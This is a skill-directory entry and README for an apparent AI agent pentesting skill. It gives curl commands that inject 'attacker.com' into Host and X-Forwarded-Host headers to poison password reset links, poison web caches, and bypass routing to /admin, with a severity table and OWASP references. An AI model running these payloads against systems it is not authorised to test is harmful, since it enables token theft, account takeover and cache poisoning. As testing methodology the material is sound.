---
name: Host Header Injection
slug: host-header-injection
category: Quality
description: Host Header Injection tests whether a web app trusts Host or related headers when building links, routing requests, or caching responses. Use it to check for password reset poisoning, cache poisoning, and routing bypass.
github: "https://github.com/CyberStrikeus/CyberStrike/tree/main/.cyberstrike/skill/attack-host-header"
language: TypeScript
stars: 1746
forks: 269
install: "npx degit https://github.com/CyberStrikeus/CyberStrike/tree/main/.cyberstrike/skill/attack-host-header ~/.claude/skills/attack-host-header"
installs_to: ~/.claude/skills/attack-host-header
source_path: .cyberstrike/skill/attack-host-header/SKILL.md
collection_size: 51
category_size: 1354
collection_url: "https://dirskills.com/collections/CyberStrikeus/CyberStrike"
added: 2026-08-12T04:43:12.768Z
last_synced: 2026-08-12T04:43:12.768Z
canonical_url: "https://dirskills.com/skills/host-header-injection"
---

# Host Header Injection

Host Header Injection tests whether a web app trusts Host or related headers when building links, routing requests, or caching responses. Use it to check for password reset poisoning, cache poisoning, and routing bypass.

**Install:**

```bash
npx degit https://github.com/CyberStrikeus/CyberStrike/tree/main/.cyberstrike/skill/attack-host-header ~/.claude/skills/attack-host-header
```

## README

# Host Header Injection

## Objective

Exploit web server reliance on the Host header to poison password reset links, web caches, or route requests to internal services.

## Testing Methodology

### Phase 1: Password Reset Poisoning

```bash
# Trigger password reset with injected Host
curl -X POST https://TARGET/forgot-password \
  -H "Host: attacker.com" \
  -d "email=victim@example.com"

# X-Forwarded-Host variant
curl -X POST https://TARGET/forgot-password \
  -H "X-Forwarded-Host: attacker.com" \
  -d "email=victim@example.com"
```

If the reset email link contains `attacker.com`, the token is leaked when victim clicks.

### Phase 2: Duplicate Host Headers

```bash
# Two Host headers
curl https://TARGET/ \
  -H "Host: TARGET" \
  -H "Host: attacker.com"

# Host with port injection
curl https://TARGET/ \
  -H "Host: TARGET:@attacker.com"
```

### Phase 3: X-Forwarded-Host / X-Host

```bash
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com"
curl https://TARGET/ -H "X-Host: attacker.com"
curl https://TARGET/ -H "X-Forwarded-Server: attacker.com"
curl https://TARGET/ -H "X-Original-URL: /admin"
curl https://TARGET/ -H "X-Rewrite-URL: /admin"
```

### Phase 4: Absolute URL Routing

```bash
# Absolute URL overrides Host header
curl "https://TARGET/api" \
  -H "Host: internal-admin.TARGET"
```

### Phase 5: Web Cache Poisoning via Host

```bash
# If response is cached with injected host
curl https://TARGET/ -H "X-Forwarded-Host: attacker.com" -H "X-Cache: miss"
# Subsequent requests from any user will get poisoned response
```

## What Constitutes a Finding

| Finding | Severity |
|---------|----------|
| Password reset link contains injected host | Critical (P1) |
| Cache poisoned with injected host/links | High (P2) |
| Internal routing bypass (access /admin) | High (P2) |
| Host header reflected in page without sanitization | Medium (P3) |

## Evidence Requirements

- Request with injected Host header
- Response/email showing injected domain
- For cache poisoning: cached response serving injected content
- For password reset: full reset URL with attacker domain

## References

- [PortSwigger: Host Header Attacks](https://portswigger.net/web-security/host-header)
- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)
